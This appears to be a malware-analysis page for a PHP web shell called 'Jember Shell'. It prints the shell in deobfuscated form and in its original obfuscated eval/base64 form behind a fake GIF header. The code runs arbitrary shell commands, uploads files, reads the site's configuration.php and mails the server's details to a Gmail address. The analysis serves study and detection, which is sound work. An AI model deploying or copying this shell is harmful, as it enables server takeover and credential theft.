PHP Malware Analysis

Back to list

Tags

Emails
buronankampus28@gmail.com
Title
Jember Shell
Execution
shell_exec
Input
_GET
_POST
Environment
error_reporting
php_uname
getcwd

Deobfuscated code

GIF89a?????ÿÿÿ!ù????,???????D?;?
<?php 
eval /* PHPDeobfuscator eval output */ {
    error_reporting(0);
    if (!isset($_SESSION['bajak'])) {
        $visitcount = 0;
        $web = $_SERVER["HTTP_HOST"];
        $inj = $_SERVER["REQUEST_URI"];
        $body = "Target ditemukan \n{$web}{$inj}";
        $safem0de = @ini_get('safe_mode');
        if (!$safem0de) {
            $security = "SAFE_MODE = OFF";
        } else {
            $security = "SAFE_MODE = ON";
        }
        $serper = gethostbyname($_SERVER['SERVER_ADDR']);
        $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
        mail("buronankampus28@gmail.com", "{$body}", "Hasil Bajakan http://{$web}{$inj}\n{$security}\nIP Server = {$serper}\n IP Injector= {$injektor}");
        $_SESSION['bajak'] = 1;
    } else {
        $_SESSION['bajak']++;
    }
    if (isset($_GET['clone'])) {
        $source = $_SERVER['SCRIPT_FILENAME'];
        $desti = $_SERVER['DOCUMENT_ROOT'] . "/plugins/user/kediri.phtml";
        rename($source, $desti);
    }
    $safem0de = @ini_get('safe_mode');
    if (!$safem0de) {
        $security = "SAFE_MODE : OFF";
    } else {
        $security = "SAFE_MODE : ON";
    }
    echo "<title>Jember Shell</title><br>";
    echo "<font size=2 color=#888888><b>" . $security . "</b><br>";
    $cur_user = "(" . get_current_user() . ")";
    echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
    echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";
    function pwd()
    {
        $cwd = getcwd();
        if ($u = strrpos($cwd, '/')) {
            if ($u != strlen($cwd) - 1) {
                return $cwd . '/';
            } else {
                return $cwd;
            }
        } elseif ($u = strrpos($cwd, '\\')) {
            if ($u != strlen($cwd) - 1) {
                return $cwd . '\\';
            } else {
                return $cwd;
            }
        }
    }
    echo "<form method=\"POST\" action=\"\"><font size=2 color=#888888><b>Command</b><br><input type=\"text\" name=\"cmd\"><input type=\"Submit\" name=\"command\" value=\"cok\"></form>";
    echo "<form enctype=\"multipart/form-data\" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name=\"submit\"><input type=file name=\"userfile\" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name=\"newname\" class=ta><input type=submit class=\"bt\" value=\"Upload\"></form>";
    if (isset($_POST['submit'])) {
        $uploaddir = pwd();
        if (!($name = $_POST['newname'])) {
            $name = $_FILES['userfile']['name'];
        }
        move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
            echo "Upload Failed";
        } else {
            echo "Upload Success to " . $uploaddir . $name . " Succes :p ";
        }
    }
    if (isset($_POST['command'])) {
        $cmd = $_POST['cmd'];
        echo "<pre><font size=3 color=#000000>" . shell_exec($cmd) . "</font></pre>";
    } elseif (isset($_GET['cmd'])) {
        $comd = $_GET['cmd'];
        echo "<pre><font size=3 color=#000000>" . shell_exec($comd) . "</font></pre>";
    } else {
        echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>";
    }
    if (isset($_GET['baca'])) {
        $conf = file_get_contents("../../configuration.php");
        echo $conf;
    }
};


Original code

GIF89a?????ÿÿÿ!ù????,???????D?;?
<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
?>